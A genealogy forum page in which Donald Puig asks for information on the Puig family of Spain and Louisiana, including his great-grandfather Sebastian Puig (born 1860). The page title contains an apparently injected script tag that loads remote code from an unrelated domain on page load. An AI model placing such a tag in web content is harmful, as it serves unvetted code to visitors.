Looking for PUIG of Spain and Louisiana<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for PUIG of Spain and Louisiana

Query by dpuig

My Name is Donald PUIG and I've been doing research of my family off and on for 20 or so years. No matter how many time I restart, I've always got stuck at the ancestors of my great grandfather Sebastian PUIG. Hew was born in 1860 in Louisiana and died 0m 2 Mar 1895 in New Orleans, LA. He was married to Manuela TRIGO who died on 24 Jul 1907 in New Orleans. I recently received a hint that Sebastian PUIG's father may have been Felio Feliciano Jose PUIG born about 1835 and married to Teofila Matilde GELPI; not further info on her.

I would love to hear from anyone having information on the PUIG family and would appreciated anything at all.

Thanks, Donald

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on 2014-12-13 16:08:07

dpuig has been a Family Tree Circles member since Dec 2014.

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